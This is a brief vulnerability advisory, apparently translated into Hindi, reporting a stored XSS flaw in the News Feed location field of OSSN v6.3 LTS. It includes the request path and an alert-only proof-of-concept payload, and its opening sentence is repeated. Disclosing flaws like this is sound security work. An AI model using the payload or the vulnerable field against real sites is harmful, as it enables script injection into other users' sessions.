
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS में न्यूज़ फ़ीड मॉड्यूल के माध्यम से एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) कमज़ोरी पाई गई है।
OpenTeknik LLC OSSN ओपन सोर्स सोशल नेटवर्क v6.3 LTS में News Feed मॉड्यूल के माध्यम से एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता पाई गई।
हमलावर को संग्रहीत XSS का शोषण करने के लिए "न्यूज़ फीड" पर कुछ पोस्ट करना होगा और स्थान इनपुट पर XSS पेलोड डालना होगा। सबमिशन के तुरंत बाद XSS पेलोड लॉन्च हो जाएगा।
http://ip_address:port/ossn/home
POST /ossn/action/wall/post/a?ossn_ts=1656419179&ossn_token=83b0ebdb6b2bbbcbaa0b804ce5cf3b5fba29a25474715bf2f7e4bbbd85316a86
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome संस्करण 102.0.5005.115 (आधिकारिक बिल्ड) (x86_64)
:shipit: Grim The Ripper Team by SOSECURE Thailand
संदर्भ: